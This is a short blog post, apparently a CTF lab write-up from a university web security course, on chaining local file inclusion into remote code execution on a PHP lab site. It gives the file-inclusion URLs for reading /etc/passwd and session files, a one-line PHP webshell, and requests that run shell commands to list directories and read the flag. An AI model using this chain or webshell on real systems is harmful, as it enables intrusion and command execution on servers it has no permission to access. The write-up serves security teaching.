Simple Web 0x07(Lab - HakkaMD)

Posted on 2023-01-31 | Post modified | In Security Course｜NTUST WS｜LFI |

Simple Web 0x07(Lab - HakkaMD)

tags: `NTUSTWS` `CTF` `Web`

Challenge: http://h4ck3r.quest:8401

Background

資安這條路-Local File Inclusion

Exploit - LFI to RCE

First things first, the website has LFI problem

http://h4ck3r.quest:8401/?module=/etc/passwd
通靈 It provided phpinfo() so that we can check the save address of session. The setting is default, thus we can use LFI to read session file: http://h4ck3r.quest:8401/?module=/tmp/sess_0qvmvnk5lh140239e6ol9l16h1 We can see that session file store the data of what we enter. Therefore, we could enter webshell to get shell

webshell

 <?php system($_GET['sh']); ?>
 ↓
 http://h4ck3r.quest:8401/?module=/tmp/sess_2f0dilri9ju4553th2bkclefal&sh=ls%20/
 ↓

 ↓
 http://h4ck3r.quest:8401/?module=/tmp/sess_2f0dilri9ju4553th2bkclefal&sh=cat%20/flag_aff6136bbef82137

Then we got flag!!!

Post author: SBK6401
Post link: https://bernie6401.github.io/Simple-Web-0x07(Lab-HakkaMD)/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.